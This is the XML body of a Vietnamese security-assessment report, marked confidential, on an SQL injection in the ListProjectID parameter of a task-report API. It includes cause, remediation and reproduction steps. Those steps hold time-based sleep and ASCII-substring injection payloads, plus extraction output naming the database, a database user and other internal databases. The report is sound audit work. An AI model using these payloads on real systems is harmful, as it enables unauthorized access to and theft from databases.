          <w:p w:rsidR="00C77F0E" w:rsidRDefault="00C77F0E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65" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00C77F0E" w:rsidRDefault="0048559F" w:rsidP="00C03CEC">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:ind w:left="0"/>
            </w:pPr>
            <w:r w:rsidRPr="0048559F">
              <w:t>/APIS/TaskAPI/api/Report/getReportGanttData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C77F0E" w:rsidRDefault="00C77F0E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F0E" w:rsidTr="00C03CEC">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="714" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00C77F0E" w:rsidRDefault="00C77F0E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65" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00C77F0E" w:rsidRPr="002B57D0" w:rsidRDefault="0048559F" w:rsidP="00C03CEC">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:ind w:left="0"/>
            </w:pPr>
            <w:r w:rsidRPr="0048559F">
              <w:t>/APIS/TaskAPI/api/Report/getAllTaskByUser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C77F0E" w:rsidRDefault="00C77F0E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F0E" w:rsidTr="00C03CEC">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="714" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00C77F0E" w:rsidRDefault="00C77F0E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65" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00C77F0E" w:rsidRPr="002B57D0" w:rsidRDefault="0048559F" w:rsidP="0048559F">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:ind w:left="0"/>
            </w:pPr>
            <w:r>
              <w:t>/APIS/TaskAPI/api/Report/GetSumeryTaskByTime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C77F0E" w:rsidRPr="002B57D0" w:rsidRDefault="00C77F0E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59F" w:rsidTr="00C03CEC">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="714" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="0048559F" w:rsidRDefault="0048559F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65" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="0048559F" w:rsidRPr="002B57D0" w:rsidRDefault="0048559F" w:rsidP="00C03CEC">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:ind w:left="0"/>
            </w:pPr>
            <w:r w:rsidRPr="0048559F">
              <w:t>/APIS/TaskAPI/api/Report/gettaskallocationresource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48559F" w:rsidRPr="002B57D0" w:rsidRDefault="0048559F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59F" w:rsidTr="00C03CEC">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="714" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="0048559F" w:rsidRDefault="0048559F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65" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="0048559F" w:rsidRPr="002B57D0" w:rsidRDefault="0048559F" w:rsidP="00C03CEC">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:ind w:left="0"/>
            </w:pPr>
            <w:r w:rsidRPr="0048559F">
              <w:t>/APIS/TaskAPI/api/Report/getReportStatusTask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48559F" w:rsidRPr="002B57D0" w:rsidRDefault="0048559F" w:rsidP="00C03C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7F0E" w:rsidRDefault="00C77F0E" w:rsidP="00C77F0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7F0E" w:rsidRPr="00326570" w:rsidRDefault="00C77F0E" w:rsidP="0048559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Mô tả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F7D7C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Tại t</w:t>
      </w:r>
      <w:r w:rsidR="0048559F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">ham số </w:t>
      </w:r>
      <w:r w:rsidR="0048559F" w:rsidRPr="009303C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ListProjectID</w:t>
      </w:r>
      <w:r w:rsidR="00DF7D7C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> trong body request cho phép chèn truy vấn câu truy vấn dẫn đến lỗ hổng SQL injection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C77F0E" w:rsidRDefault="00C77F0E" w:rsidP="00C77F0E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Nguy cơ</w:t>
      </w:r>
      <w:r w:rsidR="00DF7D7C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>: Attacker có thể khai thác, phá hoại cơ sở dữ liệu</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C77F0E" w:rsidRPr="00326570" w:rsidRDefault="00C77F0E" w:rsidP="00C77F0E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:highlight w:val="red"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00326570">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="red"/>
        </w:rPr>
        <w:t>Mức độ</w:t>
      </w:r>
      <w:r w:rsidRPr="00326570">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="red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red"/>
        </w:rPr>
        <w:t>Nguy hiểm</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C77F0E" w:rsidRPr="009E7183" w:rsidRDefault="00C77F0E" w:rsidP="00750967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Nguyên nhân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750967">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Lỗi kiểm soát , xử lí dữ liệu đầu vào tại tham số </w:t>
      </w:r>
      <w:r w:rsidR="00750967" w:rsidRPr="009303C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ListProjectID</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C77F0E" w:rsidRPr="009E7183" w:rsidRDefault="00C77F0E" w:rsidP="00750967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Khắc phục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750967">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Sử dụng thư viện phong chống SQL injection của MISA </w:t>
      </w:r>
      <w:r w:rsidR="00750967" w:rsidRPr="00750967">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>MySqlSecureUtil.SafeSQLiteral</w:t>
      </w:r>
      <w:r w:rsidR="00750967">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> , tuân thủ lập trình an toàn</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C77F0E" w:rsidRDefault="00C77F0E" w:rsidP="00C77F0E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Dựng lại lỗ hổng </w:t>
      </w:r>
      <w:r w:rsidRPr="009E7183">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00750967" w:rsidRDefault="00750967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50967" w:rsidRDefault="00750967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1: Sử dụng burpsuite bắt request</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00750967" w:rsidRDefault="00750967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841509" wp14:editId="11FBBE3B">
            <wp:extent cx="5943600" cy="291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67" w:rsidRDefault="007C532A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2: Chèn truy vấn kiểm tra phản hồi từ server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007C532A" w:rsidRDefault="007C532A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(select*from(select(sleep(1</w:t>
      </w:r>
      <w:r w:rsidRPr="007C532A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>0)))a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>) -&gt; delay 10s</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007C532A" w:rsidRDefault="007C532A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9BB936" wp14:editId="1C16BCFE">
            <wp:extent cx="5943600" cy="2894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2A" w:rsidRDefault="007C532A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3: Khai thác bằng kĩ thuật Time-Based Sql injection + ASCII</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00750967" w:rsidRDefault="007C532A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(SELECT*</w:t>
      </w:r>
      <w:r w:rsidR="00750967" w:rsidRPr="00750967">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>FROM (SELECT(IF(Ascii(substring(database(),10,1))=102,sleep(3),0)))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750967" w:rsidRPr="0075096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C532A" w:rsidRDefault="007C532A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Kết quả: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007C532A" w:rsidRDefault="007C532A" w:rsidP="00357E9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database: </w:t>
      </w:r>
      <w:r w:rsidRPr="007C532A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">amis_platform_tms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user: </w:t>
      </w:r>
      <w:r w:rsidRPr="007C532A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>tasgov@%</w:t>
      </w:r>
      <w:r w:rsidR="00880559">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> , </w:t>
      </w:r>
      <w:r w:rsidR="00880559" w:rsidRPr="00880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Ngoài ra </w:t>
      </w:r>
      <w:r w:rsidR="00880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còn </w:t>
      </w:r>
      <w:r w:rsidR="00880559" w:rsidRPr="00880559">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>các DB khác</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00880559" w:rsidRP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lastRenderedPageBreak/>
        <w:t>[19:19:16] [INFO] retrieved: test_eoffice_cego</w:t>
      </w:r>
    </w:p>
    <w:p w:rsid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[20:02:42] [INFO] retrieved: test_eoffice_platform</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00880559" w:rsidRP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[21:12:06] [INFO] retrieved: test_eoffice_platform_management</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00880559" w:rsidRP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[22:09:43] [INFO] retrieved: test_eoffice_platform_authen</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00880559" w:rsidRP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[02:03:19] [INFO] retrieved: amis_platform_monitor</w:t>
      </w:r>
    </w:p>
    <w:p w:rsid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[03:10:23] [INFO] retrieved: am</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>is_platform_misajsc_payroll_dis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00880559" w:rsidRP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[04:17:44] [INFO] retrieved: amis_platform_integration_gotadi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00880559" w:rsidRP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[05:36:01] [INFO] retrieved: amis_platform_misajsc_employees_profile</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00880559" w:rsidRP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[06:36:56] [INFO] retrieved: amis_platform_misajsc_payroll</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00880559" w:rsidRP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[07:40:23] [INFO] retrieved: amis_platform_misajsc_timesheet</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00880559" w:rsidRDefault="00880559" w:rsidP="00880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559">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>[08:23:27] [INFO] r</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>etrieved: amis_platform_misajsc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00750967" w:rsidRDefault="00750967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50967" w:rsidRDefault="00750967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4CD2" w:rsidRPr="00357E93" w:rsidRDefault="00A14CD2" w:rsidP="00357E93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14CD2" w:rsidRPr="00357E93">
      <w:footerReference w:type="default" r:id="rId14"/>
      <w:pgSz w:w="12240" w:h="15840"/>
      <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="0" w:footer="576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55" w:rsidRDefault="00367655">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00367655" w:rsidRDefault="0036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46D" w:rsidRDefault="005A1BAF">
    <w:pPr>
      <w:pStyle w:val="Footer"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        <w:i/>
      </w:rPr>
      <w:t>Tài liệu chứa thông tin quan trọng, nhạy cảm. Nghiêm cấm chia sẻ trao đổi dưới mọi hình thức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55" w:rsidRDefault="00367655">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00367655" w:rsidRDefault="00367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1A9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="49B65368"/>
    <w:lvl w:ilvl="0" w:tplc="3D2AF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4C96"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="249A7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D0C78"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="310AC5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82185C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3BAA44A8"/>
    <w:lvl w:ilvl="0" w:tplc="588C5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203A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="196C8684"/>
    <w:lvl w:ilvl="0" w:tplc="D6309A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3526"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="61AC7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46B13CB7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="571C5DE2"/>
    <w:lvl w:ilvl="0" w:tplc="FCE8D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C4C45"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B7E092B8"/>
    <w:lvl w:ilvl="0" w:tplc="D7F2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B563D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="010467D2"/>
    <w:lvl w:ilvl="0" w:tplc="7BC0F6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55155"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="825A2666"/>
    <w:lvl w:ilvl="0" w:tplc="E23005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D103D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E326A796"/>
    <w:lvl w:ilvl="0" w:tplc="111A8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D616E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1A4E719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F11C9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="06681B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6D"/>
    <w:rsid w:val="000019F5"/>
    <w:rsid w:val="00021495"/>
    <w:rsid w:val="00034F82"/>
    <w:rsid w:val="000E7053"/>
    <w:rsid w:val="0015446D"/>
    <w:rsid w:val="00164776"/>
    <w:rsid w:val="00173771"/>
    <w:rsid w:val="00193E92"/>
    <w:rsid w:val="001C543A"/>
    <w:rsid w:val="00210019"/>
    <w:rsid w:val="0023593E"/>
    <w:rsid w:val="00272792"/>
    <w:rsid w:val="002B57D0"/>
    <w:rsid w:val="002D2F47"/>
    <w:rsid w:val="00326570"/>
    <w:rsid w:val="00357E93"/>
    <w:rsid w:val="00361977"/>
    <w:rsid w:val="00367655"/>
    <w:rsid w:val="003B1F4F"/>
    <w:rsid w:val="004211CD"/>
    <w:rsid w:val="0042546E"/>
    <w:rsid w:val="0048559F"/>
    <w:rsid w:val="00490DA1"/>
    <w:rsid w:val="0050716B"/>
    <w:rsid w:val="005415CA"/>
    <w:rsid w:val="00571E60"/>
    <w:rsid w:val="005A1BAF"/>
    <w:rsid w:val="00677B14"/>
    <w:rsid w:val="00750967"/>
    <w:rsid w:val="007C532A"/>
    <w:rsid w:val="00806578"/>
    <w:rsid w:val="00880559"/>
    <w:rsid w:val="00885EA4"/>
    <w:rsid w:val="0091026D"/>
    <w:rsid w:val="009217BB"/>
    <w:rsid w:val="009303C1"/>
    <w:rsid w:val="0095276E"/>
    <w:rsid w:val="009548D1"/>
    <w:rsid w:val="009739DB"/>
    <w:rsid w:val="009B3B88"/>
    <w:rsid w:val="009E073F"/>
    <w:rsid w:val="009E7183"/>
    <w:rsid w:val="00A14CD2"/>
    <w:rsid w:val="00A93A25"/>
    <w:rsid w:val="00AC472D"/>
    <w:rsid w:val="00B51B64"/>
    <w:rsid w:val="00BA0858"/>
    <w:rsid w:val="00C17E74"/>
    <w:rsid w:val="00C61092"/>
    <w:rsid w:val="00C76486"/>
    <w:rsid w:val="00C77F0E"/>
    <w:rsid w:val="00CB45BF"/>
    <w:rsid w:val="00CF5880"/>
    <w:rsid w:val="00D805D9"/>
    <w:rsid w:val="00DB2B39"/>
    <w:rsid w:val="00DF7D7C"/>
    <w:rsid w:val="00E14401"/>
    <w:rsid w:val="00E20693"/>
    <w:rsid w:val="00EB6BFA"/>
    <w:rsid w:val="00EF1689"/>
    <w:rsid w:val="00F2290C"/>
    <w:rsid w:val="00F40640"/>
    <w:rsid w:val="00F76DB6"/>
    <w:rsid w:val="00F86A5C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F583"/>
  <w15:docId w15:val="{34A5F35C-4BE1-48DA-A354-9A3EACCC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335F6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04A1"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="FooterChar">
    <w:name w:val="Footer Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Footer"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
    <w:rsid w:val="008E04A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577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D0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&#7871;t%20qu&#7843;%20&#273;&#225;nh%20gi&#225;%20d&#7921;%20&#225;n%20MISA%20Partner_2nd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69E8-45D8-4598-9E88-FE2BE740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9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193</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-06-11T04:16:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-12-15T10:59:00Z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